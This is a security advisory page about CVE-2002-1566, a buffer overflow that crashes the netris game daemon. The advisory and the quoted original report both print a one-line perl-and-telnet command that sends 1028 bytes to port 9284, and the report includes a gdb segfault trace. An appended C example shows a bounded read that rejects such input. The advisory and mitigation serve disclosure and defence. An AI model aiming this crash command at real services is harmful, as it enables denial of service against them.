


Category:   Application (Game)  >   netris
Vendors:   Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
SecurityTracker URL:
CVE Reference:   CVE-2002-1566
Date:  Aug 21 2003
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 0.52
Description:   A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284

Impact:   A remote user can cause the netris daemon to crash.
Solution:   The vendor has released a fixed version (0.52), available at:

Vendor URL:
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
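
An added example, not netris code and not part of the advisory: a receive routine in C that enforces a length boundary on peer input (the advisory lists the cause as a boundary error), fed the same 1028-byte run of 'a' over a local socketpair. The 1024-byte buffer, the newline framing and all function names are assumptions for illustration; the advisory does not describe netris's buffer size or wire format.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#define MSG_MAX 1024                 /* assumed size, not from the netris source */
enum { MSG_EOF = -1, MSG_TOO_LONG = -2 };

/* Read one '\n'-terminated message from fd into buf (capacity cap).
 * Returns its length, MSG_EOF if the peer closed or errored first, or
 * MSG_TOO_LONG once cap bytes have arrived without a terminator. */
int read_msg_bounded(int fd, char *buf, size_t cap)
{
    size_t n = 0;
    while (n < cap) {                /* never index past buf[cap - 1] */
        if (read(fd, buf + n, 1) <= 0)
            return MSG_EOF;
        if (buf[n] == '\n') {
            buf[n] = '\0';
            return (int)n;
        }
        n++;
    }
    return MSG_TOO_LONG;             /* caller should drop the connection */
}

/* Constructed harness: acts as the remote peer over a local socketpair and
 * sends len (at most 2047) copies of byte c, optionally followed by '\n'. */
int peer_sends(char c, size_t len, int terminate, char *out, size_t cap)
{
    char data[2048];
    int sv[2], rc = MSG_EOF;
    if (len > sizeof data - 1 || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return MSG_EOF;
    memset(data, c, len);
    if (terminate) data[len++] = '\n';
    if (write(sv[0], data, len) == (ssize_t)len) {
        shutdown(sv[0], SHUT_WR);    /* peer is done sending */
        rc = read_msg_bounded(sv[1], out, cap);
    }
    close(sv[0]); close(sv[1]);
    return rc;
}

int main(void)
{
    char buf[MSG_MAX];
    printf("1028 x 'a', no newline: %d\n", peer_sends('a', 1028, 0, buf, sizeof buf));
    return 0;
}
```

The oversized input is rejected with MSG_TOO_LONG instead of being copied, so the process keeps running and can close that connection.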

Message History:   None.

 Source Message Contents

Subject:  netris-0.5.



I found a remote bug in the latest version of netris (0.5).

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...

on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/

Exploit code is still under development.. ;)

Sorry for my terrible English.

best regards,
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *




